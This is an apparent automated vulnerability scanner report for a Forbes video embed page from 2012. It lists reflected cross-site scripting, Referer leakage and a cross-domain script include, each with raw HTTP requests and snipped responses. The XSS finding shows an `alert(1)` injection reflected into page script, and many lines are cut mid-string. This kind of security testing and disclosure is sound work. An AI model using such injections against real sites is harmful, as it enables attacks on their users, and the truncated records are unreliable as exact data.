1. Cross-site scripting (reflected)
2. Cross-domain Referer leakage
3. Cross-domain script include
Severity: | High |
Confidence: | Certain |
Host: | http://video.forbes.com |
Path: | /embedvideo/ |
GET /embedvideo/?format=frame Host: video.forbes.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.forbes.com Cookie: OAX=riTaAk8CL7EACG5x; __unam=1e2567e-134a0 Content-Length: 10 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Date: Mon, 02 Jan 2012 22:31:20 GMT Content-Length: 10866 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Conte ...[SNIP]... scription").hide(); }); nextUrl = "fvn/inidaily/jim showID = "80"; cdnAssetUrl = "http://images.forbes.com renderMode = "render367ef";alert(1)/ networklink = ""; if(videoThumbnail == null || videoThumbnail == "" || videoThumbnail.indexOf(". videoThumbnail = "http://images.forbes.com ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://video.forbes.com |
Path: | /embedvideo/ |
GET /embedvideo/?format=frame Host: video.forbes.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.forbes.com Cookie: OAX=riTaAk8CL7EACG5x; __unam=1e2567e-134a0 Content-Length: 10 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Date: Mon, 02 Jan 2012 22:30:50 GMT Content-Length: 11268 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Conte ...[SNIP]... <link href="http://images <script src="http://cdn.gigya.com ...[SNIP]... <div class='playerNotSupported <a href='http://www <span class='topLine'> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://video.forbes.com |
Path: | /embedvideo/ |
GET /embedvideo/?format=frame Host: video.forbes.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.forbes.com Cookie: OAX=riTaAk8CL7EACG5x; __unam=1e2567e-134a0 Content-Length: 10 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Date: Mon, 02 Jan 2012 22:30:50 GMT Content-Length: 11268 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Conte ...[SNIP]... <link href="http://images <script src="http://cdn.gigya.com ...[SNIP]... |